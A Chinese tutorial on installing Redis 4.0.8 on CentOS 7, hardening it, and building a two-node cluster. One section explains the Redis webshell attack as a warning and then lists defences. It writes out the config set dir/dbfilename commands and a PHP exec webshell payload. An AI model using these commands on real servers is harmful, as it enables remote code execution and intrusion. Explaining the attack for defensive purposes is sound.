AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

CentOS7.X安装Redis-4.0.8以及Redis集群搭建

2018-06-11 3568
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
云数据库 Tair(兼容Redis),内存型 2GB
推荐场景:
通过缓存加速数据库访问
简介: CentOS7.X安装Redis-4.0.8以及Redis集群搭建

我的个人网站

安装redis

  1. 安装前的准备

    yum install \
vim \
wget \
make \
gcc \
gcc-c++ \
automake \
autoconf \
-y \

  2. 下载解压并安装

    cd /root
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar -zxzf redis-4.0.8.tar.gz
cd redis-4.0.8
make PREFIX=/usr/local/redis/ install

  3. 创建配置中要求的数据文件存储位置

    mkdir /data
mkdir /data/redis
mkdir /usr/local/redis/log

  4. 添加修改配置文件参考配置

    cp ./redis.conf /usr/local/redis
vim /usr/local/redis/redis.conf

# IP绑定
bind 127.0.0.1 192.168.0.111
# 保护模式(开启条件为各redis之间可以互相通信,做集群不可开启)
protected-mode yes
# 访问端口
port 6379
# 连接超时,单位S,0为不启用超时
timeout 0
# 以守护进程运行
daemonize yes
# 数据文件路径
dir /data/redis
# 进程ID文件的路径
pidfile /usr/local/redis/log/redis.pid
# 日志文件路径
logfile /usr/local/redis/log/redis.log
# 开启键过期删除通知
notify-keyspace-events Ex

ESC
:wq

# 以下安全配置选项仅作参考
    # 禁用部分危险命令
    rename-command FLUSHALL ""
    rename-command CONFIG   ""
    rename-command EVAL     ""
    # 添加访问密码
    requirepass ********
    # IP绑定本机
    bind 127.0.0.1

  5. 性能优化

    # 编辑/etc/rc.local
vim /etc/rc.local

echo never > /sys/kernel/mm/transparent_hugepage/enabled

ESC
:wq

# 添加/etc/rc.local执行权限
chmod +x /etc/rc.d/rc.local

# 编辑/etc/sysctl.conf
vim /etc/sysctl.conf

vm.overcommit_memory = 1
net.core.somaxconn = 1024

ESC
:wq

# 立即解决
echo never > /sys/kernel/mm/transparent_hugepage/enabled
echo 1024 > /proc/sys/net/core/somaxconn
sysctl vm.overcommit_memory=1
sysctl -p

  6. 修改目录归属

    useradd -s /sbin/nologin -M redis
chown -R redis:redis /data/redis
chown -R redis:redis /usr/local/redis

  7. 启动redis并设置开机启动

    # 进入单元文件目录
cd /etc/systemd/system

# 创建redis单元文件,格式为: [单元文件名].[单元文件类型]
vim redis.service

[Unit]
Description=Start redis on boot.
After=default.target network.target

[Service]
User=redis
Group=redis
Type=forking
PIDFile=/usr/local/redis/log/redis.pid
ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=false
Restart=always

[Install]
WantedBy=multi-user.target

ESC
:wq

# 修改文件权限为只有root用户可以编辑该文件
chown -R root:root /etc/systemd/system/redis.service
chmod -R 644 /etc/systemd/system/redis.service

# 更新systemd
systemctl daemon-reload
systemctl enable redis
systemctl start redis

  8. 存入数据

    /usr/local/redis/bin/redis-cli -h 127.0.0.1

set num 123
save
get num
quit

  9. 批量删除匹配规则数据

    redis-cli keys [匹配规则]|xargs redis-cli del

Redis宕机 aof文件损坏 启动失败

  1. 拷贝aof文件

  2. 修复坏损的aof文件

    redis-check-aof --fix [aof文件名]
  3. 重新启动Redis

Redis漏洞webshell的利用

参考链接

  1. Redis该漏洞用到的原理如下

    1. redis原生支持通过'redis-cli>config set'在不重启redis服务的情况
      下,动态修改配置dir、dbfilename;
    2. redis的配置中如果指定'dir /www/'和'dbfilename test.php',则当执
      行save命令时,会在/www/目录下生成一个数据存储文件test.php,虽然该文

    件是一个二进制文件,但其内容中包含保存的数据的值,如果/www/目录为web
    目录,则/www/test.php则会被人利用,成为入侵你服务器的入口;

  2. 漏洞举例(这是一个负面教材)

    1. redis以超级管理员用户root运行
    2. Nginx以超级管理员用户root启动,子进程也以root运行

    3. web服务器为nginx,并做如下配置:

      server {
    listen       x;
    server_name  xxx.xxx.com;
    root         /www;

    location / {
        index    index.php index.html index.htm;
    }

    location ~ \.php$ {
        fastcgi_index  index.php;
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}

    4. 通过redis-cli执行了以下命令

      config set dir /www/
config set dbfilename test.php
set test "<?php exec($_GET['cmd']); ?>"
save

    5. 这时候可怕的事情出现了

      1. 在/www/目录下,存在test.php文件,它可以通过http://xxx.xxx.com/test.php访问到
      2. 如果现在访问http://xxx.xxx.com/test.php?cmd=xxx,那么xxx就会被以root用户执行(xxx为任意linux命令)

Redis漏洞webshell的防范

  1. 不要线上使用redis的web管理工具
  2. redis以低权限用户运行(如rediser等让人想不到的用户名)
  3. redis仅允许通过本机和内网访问(bind 127.0.0.1 192.168.0.12/24)
  4. redis禁用config命令(在配置文件中可以禁用rename-command CONFIG "")
  5. web服务子进程以低权限用户运行(因为webshell的运行用户为web服务的子进程)

redis集群(cluster方式)

  1. 集群前的配置(单机两服务测试6379,6380)

    # 内网IP:192.168.0.100

  2. 修改redis.conf

    vim /usr/local/redis/redis.conf

# 启用cluster
cluster-enabled yes
# 调用cluster配置文件
cluster-config-file nodes-6379.conf
# 集群超时
cluster-node-timeout 15000
# 关闭宕机全停
cluster-require-full-coverage no
# 集群从属元素个数
cluster-slave-validity-factor 10
# 从机数最低迁移值(master至少有两台slave,才能做slave迁移)
cluster-migration-barrier 1

ESC
:wq

  3. 配置文件添加

    yum install ruby
gem install redis

cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf

mkdir /usr/local/redis/data/6379
mkdir /usr/local/redis/data/6380

  4. 修改redis-6379.conf

    vim /usr/local/redis/redis-6379.conf

unixsocket /usr/local/redis/data/6379/redis.sock
pidfile /usr/local/redis/log/redis_6379.pid
logfile /usr/local/redis/log/redis_6379.log
dir /usr/local/redis/data/6379/
bind 192.168.0.100
port 6379

ESC
:wq

  5. 修改redis-6380.conf

    vim /usr/local/redis/redis-6380.conf

unixsocket /usr/local/redis/data/6380/redis.sock
pidfile /usr/local/redis/log/redis_6380.pid
logfile "/usr/local/redis/log/redis_6380.log"
dir /usr/local/redis/data/6380/
bind 192.168.0.100
port 6380

ESC
:wq

  6. 修改开机启动

    vim /etc/rc.local

/usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
/usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf

ESC
:wq

  7. 创建cluster

    cd /root/redis/src/
# 查看帮助
./redis-trib.rb help
# 添加绑定
./redis-trib.rb create --replicas 1 192.168.0.100:6379 192.168.0.100:6380

  8. 集群测试

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 -c

  9. 正常关闭(不要强制关闭)

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 shutdown
  10. 领支付宝红包支持作者

    扫码领支付宝红包

文章标签:
云数据库 Tair(兼容 Redis)
NoSQL
Redis
PHP
C语言
开发工具
应用服务中间件
数据安全/隐私保护
文件存储
nginx
安全
关键词:
安装云数据库 Tair(兼容 Redis)
CentOS安装
云数据库 Tair(兼容 Redis)安装
CentOs安装redis
centos云数据库 Tair(兼容 Redis)
qq2233466866
目录
相关文章
34789737
|
2月前
|
存储 Ubuntu Linux
VMware-安装CentOS系统教程及安装包
虚拟机相当于是一个独立于你电脑的环境,在这个环境上面,你可以安装Linux、Windows、Ubuntu等各个类型各个版本的系统,在这个系统里面你不用担心有病读等,不用担心文件误删导致系统崩溃。 虚拟机也和正常的电脑系统是一样的,也可以开关机,不用的时候,你关机就可以了,也不会占用你的系统资源,使用起来还是比较方便 这里也有已经做好的CentOS 7系统,下载下来解压后直接用VMware打开就可以使用
34789737
649 69
IvanCodes
|
1月前
|
存储 分布式计算 Linux
安装篇--CentOS 7 虚拟机安装
VMware 装 CentOS 7 不知道从哪下手?这篇超详细图文教程手把手教你在 VMware Workstation 中完成 CentOS 7 桌面系统的完整安装流程。从 ISO 镜像下载、虚拟机配置,到安装图形界面、设置用户密码,每一步都有截图讲解,适合零基础新手快速上手。装好之后无论你是要搭 Hadoop 集群,还是练 Linux ,这个环境都够你折腾一整天!
IvanCodes
716 2
游客e5t4h2fblkshy
|
3月前
|
关系型数据库 应用服务中间件 nginx
Docker一键安装中间件(RocketMq、Nginx、MySql、Minio、Jenkins、Redis)
本系列脚本提供RocketMQ、Nginx、MySQL、MinIO、Jenkins和Redis的Docker一键安装与配置方案,适用于快速部署微服务基础环境。
游客e5t4h2fblkshy
422 5
凉凉心.
|
20天前
|
NoSQL 算法 Redis
【Docker】(3)学习Docker中 镜像与容器数据卷、映射关系!手把手带你安装 MySql主从同步 和 Redis三主三从集群!并且进行主从切换与扩容操作,还有分析 哈希分区 等知识点!
Union文件系统(UnionFS)是一种**分层、轻量级并且高性能的文件系统**,它支持对文件系统的修改作为一次提交来一层层的叠加,同时可以将不同目录挂载到同一个虚拟文件系统下(unite several directories into a single virtual filesystem) Union 文件系统是 Docker 镜像的基础。 镜像可以通过分层来进行继承,基于基础镜像(没有父镜像),可以制作各种具体的应用镜像。
凉凉心.
182 5
蓝易云
|
2月前
|
Ubuntu Linux 索引
Centos 7、Debian及Ubuntu系统中安装和验证tree命令的指南。
通过上述步骤,我们可以在CentOS 7、Debian和Ubuntu系统中安装并验证 `tree`命令。在命令行界面中执行安装命令,然后通过版本检查确认安装成功。这保证了在多个平台上 `tree`命令的一致性和可用性,使得用户无论在哪种Linux发行版上都能使用此工具浏览目录结构。
蓝易云
301 78
IvanCodes
|
1月前
|
安全 关系型数据库 MySQL
CentOS 7 yum 安装 MySQL教程
在CentOS 7上安装MySQL 8,其实流程很清晰。首先通过官方Yum仓库来安装服务,然后启动并设为开机自启。最重要的环节是首次安全设置:需要先从日志里找到临时密码来登录,再修改成你自己的密码,并为远程连接创建用户和授权。最后,也别忘了在服务器防火墙上放行3306端口,这样远程才能连上。
IvanCodes
362 16
蓝易云
|
3月前
|
Linux 网络安全 Apache
针对在Centos/Linux安装Apache过程中出现的常见问题集锦
以上每个问题的解决方案应深入分析错误日志、系统消息和各种配置文件,以找到根本原因并加以解决。务必保持系统和Apache软件包更新到最新版本,以修复已知的bugs和安全漏洞。安装和管理Web服务器是一项需要细致关注和不断学习的任务。随着技术的发展,推荐定期查看官方文档和社区论坛,以保持知识的更新。
蓝易云
205 80
蓝易云
|
2月前
|
存储 关系型数据库 MySQL
在CentOS 8.x上安装Percona Xtrabackup工具备份MySQL数据步骤。
以上就是在CentOS8.x上通过Perconaxtabbackup工具对Mysql进行高效率、高可靠性、无锁定影响地实现在线快速全量及增加式数据库资料保存与恢复流程。通过以上流程可以有效地将Mysql相关资料按需求完成定期或不定期地保存与灾难恢复需求。
蓝易云
233 10
盹猫
|
3月前
|
人工智能 数据挖掘 Linux
Centos安装Python3.7(亲测可用)
本指南详细介绍了在基于Linux(以CentOS系统为例,使用yum包管理器)的系统上安装Python 3.7版本的完整流程。Python是一种广泛使用的高级编程语言,在各种领域如软件开发、数据分析、人工智能和区块链开发等都有着重要的应用。
盹猫
377 2
蓝易云
|
2月前
|
运维 网络协议 Linux
CentOS下Bind服务的安装与故障排查
通过以上的步骤,您应该能够在CentOS系统上安装并配置BIND DNS服务,并进行基本的故障排查。
蓝易云
238 0

热门文章

最新文章

  • 1
    手把手教你用 Docker 部署 Redis
  • 2
    Redis常见面试题全解析
  • 3
    135_负载均衡:Redis缓存 - 提高缓存命中率的配置与最佳实践
  • 4
    【Docker】(3)学习Docker中 镜像与容器数据卷、映射关系!手把手带你安装 MySql主从同步 和 Redis三主三从集群!并且进行主从切换与扩容操作,还有分析 哈希分区 等知识点!
  • 5
    MySQL 与 Redis 如何保证双写一致性?
  • 6
    Redis 7.0 高性能缓存架构设计与优化
  • 7
    Redis 服务器全方位介绍:从入门到核心原理
  • 8
    SpringBoot启动时连接Redis报错:ERR This instance has cluster support disabled - 如何解决?
  • 9
    在CentOS系统中,如何统计哪个进程打开了文件描述符?
  • 10
    redis内存限制与淘汰策略
  • 1
    在CentOS系统中,如何统计哪个进程打开了文件描述符?
    70
  • 2
    安装篇--CentOS 7 虚拟机安装
    716
  • 3
    CentOS 7 yum 安装 MySQL教程
    362
  • 4
    在CentOS 8.x上安装Percona Xtrabackup工具备份MySQL数据步骤。
    233
  • 5
    CentOS系统如何查看当前内存容量。
    281
  • 6
    确定CentOS系统分区表类型(MBR或GPT)
    384
  • 7
    CentOS下Bind服务的安装与故障排查
    238
  • 8
    CentOS与Ubuntu的深度对比与分析
    286
  • 9
    CentOS 与 Ubuntu 谁与争锋
    38
  • 10
    服务器版本的CentOS和Ubuntu哪个更适合你?
    303

    • 相关课程

    更多
  • 大数据实战项目:反爬虫系统(Lua+Spark+Redis+Hadoop框架搭建)第一阶段
  • 大数据实战项目:反爬虫系统(Lua+Spark+Redis+Hadoop框架搭建)第二阶段
  • 大数据实战项目:反爬虫系统(Lua+Spark+Redis+Hadoop框架搭建)第三阶段
  • Redis入门实战演练
  • 云数据库 Redis 版使用教程
  • Redis数据库入门

    • 相关电子书

    更多
  • Redis在唯品会的应用实践——架构演进与功能定制
  • CentOS Nginx PHP JAVA 多语言镜像使用手
  • CentOS Nginx PHP JAVA多语言镜像使用手册

    • 推荐镜像

    更多
  • centos
  • centos-vault
  • centos-altarch
    • 下一篇
    一文了解:阿里云对象存储OSS是什么?